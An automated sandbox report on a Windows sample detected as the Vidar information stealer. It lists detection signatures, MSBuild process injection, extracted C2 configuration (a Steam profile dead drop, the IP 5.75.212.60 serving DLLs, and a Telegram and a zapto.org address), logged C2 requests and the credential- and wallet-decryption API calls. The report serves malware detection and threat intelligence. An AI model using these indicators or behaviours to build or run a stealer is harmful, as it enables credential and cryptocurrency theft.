Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1482751
MD5:4ea39e58d5185ea13c816062f97e001d
SHA1:4835b4fce547469ea200fc05f9bdfcfdc7572469
SHA256:1193d78ae12a46941717ff875f19ab33ce9f51f9c4ca3ef3b125abbc37560d62
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4EA39E58D5185EA13C816062F97E001D)
    • MSBuild.exe (PID: 8 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6512 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • WerFault.exe (PID: 2648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "cb71d89d3eecac4c03c1698bbe16d6d2"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000002.1691045839.0000000002AD9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.1692402449.00000000045A6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000000.00000002.1692402449.00000000039E3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.4579110.3.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                4.2.MSBuild.exe.400000.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.39e31c0.4.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    0.2.file.exe.3a109f0.6.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.file.exe.4579110.3.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        Click to see the 5 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Silenttrinity Stager Msbuild Activity
                        Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 23.192.247.89, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6512, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730

                        Snort Signatures

                        No Snort rule has matched

                        Suricata Signatures

                        Timestamp:2024-07-26T03:17:58.166553+0200
                        SID:2044247
                        Source Port:443
                        Destination Port:49734
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-26T03:18:12.224592+0200
                        SID:2028765
                        Source Port:49750
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:10.501096+0200
                        SID:2028765
                        Source Port:49747
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:01.301744+0200
                        SID:2028765
                        Source Port:49737
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:19.621041+0200
                        SID:2028765
                        Source Port:49754
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:47.150687+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49765
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T03:17:53.826668+0200
                        SID:2028765
                        Source Port:49731
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:17:59.522089+0200
                        SID:2051831
                        Source Port:443
                        Destination Port:49735
                        Protocol:TCP
                        Classtype:Malware Command and Control Activity Detected
                        Timestamp:2024-07-26T03:18:00.297595+0200
                        SID:2028765
                        Source Port:49736
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:04.383083+0200
                        SID:2028765
                        Source Port:49738
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:09.045746+0200
                        SID:2022930
                        Source Port:443
                        Destination Port:49742
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T03:17:59.521867+0200
                        SID:2049087
                        Source Port:49735
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T03:18:16.550114+0200
                        SID:2028765
                        Source Port:49753
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:17:58.862094+0200
                        SID:2028765
                        Source Port:49735
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:27.420564+0200
                        SID:2028765
                        Source Port:49759
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:17:57.520605+0200
                        SID:2028765
                        Source Port:49734
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:28.739936+0200
                        SID:2028765
                        Source Port:49760
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:25.674397+0200
                        SID:2028765
                        Source Port:49758
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:17:54.918982+0200
                        SID:2028765
                        Source Port:49732
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:06.522290+0200
                        SID:2028765
                        Source Port:49740
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:22.203919+0200
                        SID:2028765
                        Source Port:49756
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:13.800595+0200
                        SID:2028765
                        Source Port:49751
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:23.573758+0200
                        SID:2028765
                        Source Port:49757
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:08.725191+0200
                        SID:2028765
                        Source Port:49743
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:17:56.842971+0200
                        SID:2049087
                        Source Port:49733
                        Destination Port:443
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:2024-07-26T03:18:15.242730+0200
                        SID:2028765
                        Source Port:49752
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:17:56.215113+0200
                        SID:2028765
                        Source Port:49733
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:05.490210+0200
                        SID:2028765
                        Source Port:49739
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:07.652390+0200
                        SID:2028765
                        Source Port:49741
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:11.361781+0200
                        SID:2011803
                        Source Port:443
                        Destination Port:49747
                        Protocol:TCP
                        Classtype:Executable code was detected
                        Timestamp:2024-07-26T03:18:20.847588+0200
                        SID:2028765
                        Source Port:49755
                        Destination Port:443
                        Protocol:TCP
                        Classtype:Unknown Traffic
                        Timestamp:2024-07-26T03:18:03.325570+0200
                        SID:2011803
                        Source Port:443
                        Destination Port:49737
                        Protocol:TCP
                        Classtype:Executable code was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: https://5.75.212.60/sqls.dllAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259/badgesAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/-Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/AAvira URL Cloud: Label: malware
                        Source: https://t.me/armad2aAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/softokn3.dllqAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/BAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/oAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/nss3.dllQAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/softokn3.dllAvira URL Cloud: Label: malware
                        Source: https://steamcommunity.com/profiles/76561199747278259/inventory/Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/freebl3.dllOAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/mozglue.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/Avira URL Cloud: Label: malware
                        Source: https://5.75.212.60/freebl3.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/nss3.dllAvira URL Cloud: Label: malware
                        Source: https://5.75.212.60/msvcp140.dllAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 00000000.00000002.1692402449.0000000003A10000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "cb71d89d3eecac4c03c1698bbe16d6d2"}
                        Multi AV Scanner detection for domain / URL
                        Source: arpdabl.zapto.orgVirustotal: Detection: 11%Perma Link
                        Source: https://5.75.212.60/sqls.dllVirustotal: Detection: 11%Perma Link
                        Source: http://arpdabl.zapto.org/qVirustotal: Detection: 10%Perma Link
                        Source: https://5.75.212.60/-Virustotal: Detection: 11%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: file.exeReversingLabs: Detection: 32%
                        Source: file.exeVirustotal: Detection: 24%Perma Link
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: file.exeJoe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00406D50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,4_2_00406CD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,4_2_00410DF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,4_2_00408980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C576C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C576C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,4_2_6C6CA9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6C4440 PK11_PrivDecrypt,4_2_6C6C4440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C694420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,4_2_6C694420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6C44C0 PK11_PubEncrypt,4_2_6C6C44C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C7125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,4_2_6C7125B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6A8670 PK11_ExportEncryptedPrivKeyInfo,4_2_6C6A8670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,4_2_6C6CA650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6AE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,4_2_6C6AE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,4_2_6C6EA730
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: supergamesoft.pdb( source: file.exe
                        Source: Binary string: PE.pdbH] source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: supergamesoft.pdb source: file.exe
                        Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\SWxnr.pdb source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1706153820.0000000005533000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2372726063.0000000038643000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: PE.pdb source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2366512276.000000002C765000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00401110
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_004099F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0040A2C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_004156C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040C2E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00415EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,4_2_00414F80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0040B390
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00409D40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00415A70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0040AAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_004153C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_059BD4D0

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199747278259
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 23.192.247.89 23.192.247.89
                        Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
